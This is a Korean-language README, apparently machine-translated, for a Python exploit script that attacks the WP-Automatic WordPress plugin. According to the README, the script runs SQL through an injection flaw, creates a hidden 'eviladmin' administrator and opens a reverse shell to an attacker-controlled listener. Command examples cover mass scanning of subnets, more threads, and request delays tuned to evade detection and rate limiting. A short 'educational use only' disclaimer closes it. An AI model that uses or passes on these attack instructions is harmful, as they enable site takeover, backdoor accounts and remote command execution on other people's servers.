이 Python 스크립트는 WordPress 사이트에서 새 관리자 계정을 작성하고 대상 서버에서 리버스 쉘을 실행하는 프로세스를 자동화합니다. WP-Automatic 플러그인의 CSV 주입 취약성을 사용하여 WordPress 데이터베이스에서 SQL 쿼리를 실행하고 관리 액세스를 얻습니다.
서브넷 스캔 : 취약한 WordPress 설치를 위해 서브넷을 스캔하려면 --subnet 옵션을 사용할 수 있습니다. 예를 들어:
python wp-automatic-exploit.py --subnet 192.168.1.0/24 --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 1.0
이 명령은 취약한 WP 자동 플러그인이있는 WordPress 사이트의 192.168.1.0/24 서브넷을 스캔하고 제공된 리스너 설정을 사용하여이를 이용하려고 시도합니다.
지연 사용자 정의 : --delay 옵션을 사용하여 요청 간의 지연을 조정할 수 있습니다. 지연이 높을수록 감지 또는 속도 제한을 피하는 데 도움이 될 수 있지만 지연이 낮아지면 악용 프로세스가 빨라질 수 있습니다. 예를 들어:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 10 --delay 2.5
이 명령은 요청 사이에 2.5 초의 지연을 사용합니다.
원격 리시너 사용 : 리스너가 원격 컴퓨터에 설정된 경우 --lhost 및 --lport 옵션을 사용하여 IP 주소와 포트를 지정할 수 있습니다. 예를 들어:
python wp-automatic-exploit.py --targets targets.txt --lhost 192.168.1.100 --lport 8080 --threads 10 --delay 1.0
이 명령은 192.168.1.100:8080 의 청취자에게 다시 연결됩니다.
스레드 수 증가 : --threads 옵션을 사용하여 스크립트에서 사용하는 스레드 수를 늘릴 수 있습니다. 이로 인해 착취 과정이 속도가 빨라질 수 있지만 감지 가능성이 높아지거나 속도 제한 문제가 발생할 수 있습니다. 예를 들어:
python wp-automatic-exploit.py --targets targets.txt --lhost 127.0.0.1 --lport 1414 --threads 20 --delay 1.0
이 명령은 악용을 위해 20 개의 스레드를 사용합니다.
requests 라이브러리 ( pip install requests 통해 설치)domain 변수를 대상 WordPress 사이트의 URL로 바꾸십시오.eviladmin 이라는 새 관리자 사용자를 생성하고 암호를 설정하고 관리 권한을 할당합니다.참고 : 이 스크립트를 실행하기 전에 적절한 승인과 권한이 있는지 확인하십시오. 오용 된 경우 보안 취약점과 법적 결과로 이어질 수 있습니다.
이 스크립트는 교육 및 테스트 목적으로 만 제공됩니다. 저자는이 대본의 무단 또는 불법 사용에 대한 책임이 없습니다. 자신의 위험에 따라 사용하십시오.